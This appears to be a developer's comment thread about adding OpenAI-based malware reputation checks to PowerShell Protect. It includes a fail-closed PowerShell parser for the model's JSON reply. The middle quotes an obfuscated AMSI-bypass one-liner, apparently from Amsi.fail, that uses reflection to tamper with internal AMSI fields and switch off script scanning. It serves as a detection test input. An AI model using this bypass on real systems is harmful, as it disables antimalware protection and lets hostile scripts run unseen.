Hey mate. I don’t know if you will see this comment. I hope so. I’m adding AI functionality into PowerShell Protect to perform malware analysis based on reputation. I’m in the process of testing atm, however I’m getting issues with loading the configuration when running Test-PNPConfiguration. Did you have a tool/process that you used to hook a debugger into the AMSI?
Cool beans… AMSI question for you. Did you manage to extract the user identity or the process id of the executing code? It seems that it’s possible based on this, but I wanted to get your thoughts on this.
My idea is to integrate PSP with AppLocker/WDAC, where scripts that meet the AppLocker ruleset are skipped and those that don’t meet those criteria are then handled by AMSI. Coupled with OpenAI, this will make for a formidable module.
FYI: OpenAI handling Amsi.fail obfuscated code:
You:
Just the json, no explanation or usage. Analyze the following PowerShell Script for security risks. Simplify your response as a Boolean called 'result' and include a rating (scoring from bad to good) between 0 and 1. Just the json, no explanation or usage.
#Unknown - Force error
$Ag=$null;$meph=[$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).Runtime.InteropServices.Marshal]::AllocHGlobal((9076*8451/8451));$ikglrjc="+('pôãpcmmn'+'xzcõ').NormALiZe(ChaR+ChAr+CHaR+cHar+CHaR) -replace char+ChaR+CHar+ChaR+chaR+CHaR";[Threading.Thread]::Sleep(851);[Ref].Assembly.GetType("$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).$(cHAR+cHar+ChaR+cHAR+CHAr+cHAR+cHaR+Char+cHar+cHaR).$(('Àutõmát'+'îõn').NormalizE(CHaR+chAR+chaR+CHar+chAr) -replace Char+cHar+cHAr+ChAR+ChAR+char).$(cHAr+cHaR+cHAR+ChAr+cHAR+cHAr+chaR+chaR+CHAr)").GetField("$(char+ChAR+cHAr+CHAr+CHAR+CHAR+chaR+CHAr+CHAr+ChAr+chAR)", "NonPublic,Static").SetValue($Ag, $null);[Ref].Assembly.GetType("$(('Sys'+'tem').NOrmalizE(ChAr+ChAR+ChaR+CHAR+CHAR) -replace Char+cHaR+CHAR+ChAr+cHAr+char).$(cHAR+cHar+ChaR+cHAR+CHAr+cHAR+cHaR+Char+cHar+cHaR).$(('Àutõmát'+'îõn').NormalizE(CHaR+chAR+chaR+CHar+chAr) -replace Char+cHar+cHAr+ChAR+ChAR+char).$(cHAr+cHaR+cHAR+ChAr+cHAR+cHAr+chaR+chaR+CHAr)").GetField("$(cHar+CHAR+cHar+ChAR+cHaR+cHaR+chAr+CHAR+CHAR+cHAR+ChaR)", "NonPublic,Static").SetValue($null, [IntPtr]$meph);
Response:
result: True
rating: 1 (bad)
The PowerShell script appears to be obfuscated and contains multiple suspicious commands that could potentially be used for malicious purposes. The use of the AllocHGlobal method and the SetValue method with non-public, static fields are particularly concerning. Additionally, the script forces an error which could be used to hide its true purpose. Overall, this script should be treated as highly suspicious and potentially dangerous.
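Note that the reply above does not honour the "just the json" instruction, and "1 (bad)" does not match the 0 (bad) to 1 (good) scale the prompt asked for, so whatever consumes the model's answer must validate it and fail closed. The following is an added example, not PowerShell Protect's own code, showing such a parser; it assumes `result` = true means a risk was found, `rating` runs from 0 (bad) to 1 (good), and `BlockThreshold` is a made-up knob.

```powershell
# Added example (not PowerShell Protect's code): strict, fail-closed parsing of
# the model's reply to the prompt above. Assumptions: 'result' = true means the
# model found a risk; 'rating' is 0 (bad) .. 1 (good); BlockThreshold is made up.
function ConvertTo-ScanVerdict {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][AllowEmptyString()][string]$ModelResponse,
        [double]$BlockThreshold = 0.5
    )

    # Default verdict is "flag it": anything we cannot validate is treated as
    # suspicious, so a model that ignores the JSON contract cannot silently
    # whitelist a script.
    $verdict = [pscustomobject]@{ Suspicious = $true; Rating = 0.0; Reason = 'response is not valid JSON' }

    try   { $parsed = $ModelResponse | ConvertFrom-Json -ErrorAction Stop }
    catch { return $verdict }

    if ($null -eq $parsed -or $parsed -isnot [System.Management.Automation.PSCustomObject]) {
        $verdict.Reason = 'JSON is not an object'; return $verdict
    }
    if ($parsed.result -isnot [bool]) {
        $verdict.Reason = "'result' missing or not a boolean"; return $verdict
    }
    if ($null -eq $parsed.rating -or $parsed.rating -is [string] -or $parsed.rating -is [bool]) {
        $verdict.Reason = "'rating' missing or not numeric"; return $verdict
    }
    $rating = $parsed.rating -as [double]
    if ($null -eq $rating -or $rating -lt 0 -or $rating -gt 1) {
        $verdict.Reason = "'rating' is not a number in 0..1"; return $verdict
    }

    # Well-formed reply: flag when the model reports a risk or scores the
    # script below the threshold.
    $verdict.Rating     = $rating
    $verdict.Suspicious = $parsed.result -or ($rating -lt $BlockThreshold)
    $verdict.Reason     = 'model verdict'
    return $verdict
}

# Constructed sample replies: one that honours the contract, one free-text reply
# like the one quoted above, and one with a rating outside the requested range.
$samples = @(
    '{"result": true, "rating": 0.05}',
    "result: True`nrating: 1 (bad)`nThe PowerShell script appears to be obfuscated ...",
    '{"result": false, "rating": 7}'
)
foreach ($s in $samples) { ConvertTo-ScanVerdict -ModelResponse $s | Format-Table -AutoSize }
```

Only the first sample yields a model verdict; the other two are flagged with a reason explaining why the reply was rejected.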